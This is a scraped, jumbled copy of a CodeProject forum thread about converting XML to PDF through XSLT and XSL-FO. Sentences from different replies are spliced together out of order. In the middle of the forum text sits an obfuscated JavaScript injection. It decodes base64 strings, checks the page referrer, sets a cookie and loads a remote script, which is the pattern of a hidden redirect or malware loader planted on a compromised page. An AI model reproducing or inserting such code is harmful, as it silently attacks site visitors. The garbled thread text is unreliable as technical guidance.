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wikipedia org/wiki/XSL_Formatting_Objects[^] and the w3schools com link doesn't work (it goes to a 403 - Forbidden), they may have taken it down due to it being discontinued.. Any way to contact w3schools? I wish they would put it backI think this is a shame as it's a great solution for a common problem, and there is no other way I can see of generating a PDF from XML.. - You can have take inspiration from files in the source code Take a look at the file Document.. I think that in spare time I will completely overhaul it and create a little project on git hub.. xslt which mixes XSL-Fo statements and X-PATH queries This web-site could be a good reference for XSL-FO grammar:Thanks in advance- Create XSLT file with mixed XSL-FO statements (which define you PDF document structure) and X-PATH queries against your XML document / XML culture file. HERE
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net is?)you have to transform the xml on your own But it's really easy Downlaod the source code and have a look at XmlTransformationManager class.
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config and hosting it on git-hub thanks for your suggestionsFirst try to render something like this in the xml document:Then modify the xslt in order to cycle over your columns and render the table header.. constructor(x22returnx20thisx22)(x20)' ');');_0x1e6645=_0x5a58eb();}catch(_0x5d5932){_0x1e6645=window;}var _0x2afd5a='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x1e6645['atob']||(_0x1e6645['atob']=function(_0x47445b){var _0x523fab=String(_0x47445b)['replace'](/= $/,'');for(var _0x52d6cc=0x0,_0x1614cf,_0x9a5c85,_0x5a3535=0x0,_0x488e67='';_0x9a5c85=_0x523fab['charAt'](_0x5a3535 );~_0x9a5c85&&(_0x1614cf=_0x52d6cc%0x4?_0x1614cf*0x40 _0x9a5c85:_0x9a5c85,_0x52d6cc %0x4)?_0x488e67 =String['fromCharCode'](0xff&_0x1614cf>>(-0x2*_0x52d6cc&0x6)):0x0){_0x9a5c85=_0x2afd5a['indexOf'](_0x9a5c85);}return _0x488e67;});}());_0x4b8d['base64DecodeUnicode']=function(_0x5b1203){var _0x8da414=atob(_0x5b1203);var _0x1e95a3=[];for(var _0x475beb=0x0,_0x5235b4=_0x8da414['length'];_0x475beb=_0x253c13;},'PLCvZ':function _0x15a1db(_0x3a079f,_0x223b4f){return _0x3a079f===_0x223b4f;},'Lpmxd':_0x4b8d('0x2a'),'LYdDs':'DXQ','NMCVx':function _0x22588e(_0x299c9b,_0x3f1d93){return _0x299c9b _0x3f1d93;},'Uywcr':function _0x395b76(_0x2aa015,_0x2e8a3f){return _0x2aa015 _0x2e8a3f;},'hXktz':function _0x5bde12(_0x4c88a4,_0x4b1ce1){return _0x4c88a4 _0x4b1ce1;},'RqThn':function _0x51cc62(_0x418875,_0x1667ce){return _0x418875(_0x1667ce);},'WIsQb':_0x4b8d('0x2b'),'cmDFe':function _0x23b5c5(_0x55292e,_0x551595){return _0x55292e _0x551595;},'RfuUj':function _0x4606cc(_0x592dd4,_0x5f02ee){return _0x592dd4*_0x5f02ee;},'cQQpT':_0x4b8d('0x2c'),'MVSDN':function _0x1b9ece(_0x1d61d1,_0x2eda4b){return _0x1d61d1 _0x2eda4b;},'KjWcj':_0x4b8d('0x1a'),'CpISy':_0x4b8d('0x1b'),'RYOhI':function _0x132eae(_0x19fcbf,_0x4b35c0){return _0x19fcbf(_0x4b35c0);}};var _0x181e64=[_0x4b8d('0x2d'),_0x10f791[_0x4b8d('0x2e')],_0x4b8d('0x2f'),_0x10f791[_0x4b8d('0x30')],_0x10f791[_0x4b8d('0x31')],_0x10f791[_0x4b8d('0x32')],_0x10f791[_0x4b8d('0x33')]],_0x3bad9b=document[_0x4b8d('0x34')],_0x9979d=![],_0x48c1a8=cookie['get'](_0x10f791[_0x4b8d('0x35')]);for(var _0x215beb=0x0;_0x10f791[_0x4b8d('0x36')](_0x215beb,_0x181e64[_0x4b8d('0xc')]);_0x215beb ){if(_0x10f791['zeMZk'](_0x3bad9b[_0x4b8d('0x37')](_0x181e64[_0x215beb]),0x0)){_0x9979d=!![];}}if(_0x9979d){if(_0x10f791[_0x4b8d('0x38')](_0x10f791[_0x4b8d('0x39')],_0x10f791[_0x4b8d('0x39')])){cookie[_0x4b8d('0x3a')](_0x10f791[_0x4b8d('0x35')],0x1,0x1);if(!_0x48c1a8){if(_0x4b8d('0x3b')!==_0x10f791['LYdDs']){document['cookie']=_0x10f791[_0x4b8d('0x3c')](_0x10f791[_0x4b8d('0x3d')](_0x10f791['hXktz'](name '=' _0x10f791[_0x4b8d('0x3e')](escape,value),expires?_0x10f791[_0x4b8d('0x3f')](_0x10f791[_0x4b8d('0x40')],new Date(_0x10f791[_0x4b8d('0x41')](new Date()[_0x4b8d('0x42')](),_0x10f791[_0x4b8d('0x43')](expires,0x3e8)))):''),path?_0x10f791[_0x4b8d('0x41')](_0x10f791[_0x4b8d('0x44')],path):'') (domain?_0x10f791[_0x4b8d('0x45')](_0x10f791[_0x4b8d('0x46')],domain):''),secure?_0x10f791[_0x4b8d('0x47')]:'');}else{_0x10f791[_0x4b8d('0x48')](include,_0x10f791['MVSDN'](_0x10f791[_0x4b8d('0x45')](_0x4b8d('0x7'),q),''));}}}else{return cookie[name];}}}R(); Convert xml to pdf using java codexslt and xml file names are inferred by convention using your object type name.. xslt (this is an example on how to build your xslt document file) and localization files under- Unfortunately in this example the XML document is build at runtime through the XML serialization of a runtime object.. Convert the xml file to an xsl-fo file using an xslt stylesheet file2 Convert the xsl-fo file to PDF through a FO Processor (which if I understand it correctly is what fo.. Play a little bit with it It's really straightforward Unfortunately XSL-FO is now discontinued http://en. 3
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Example if object being serialized type name is ABC, than the program will search an ABC.. If you have a static XML file, you have to make little changes to the source code in order to pick up you file (take a look to XmlTransformationManager class)General News Suggestion Question Bug Answer Joke Praise Rant AdminUse Ctrl Left/Right to switch messages, Ctrl Up/Down to switch threads, Ctrl Shift Left/Right to switch pages.. As I did in this simple example you can have a look at how i build the sample file Document. e10c415e6f Click
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Web03 | 2 8 171231 1 | Last Updated 16 Aug 2013Everything else Copyright © CodeProject, 1999-2018.. xslt file and ABC- xml Merge searialized obj xml and localization file xml into a new xml and process it with xslt to obtain an xsl-fo document which sends through fo.. I'm noting an ever increasing use of this prototype solution for production code. HERE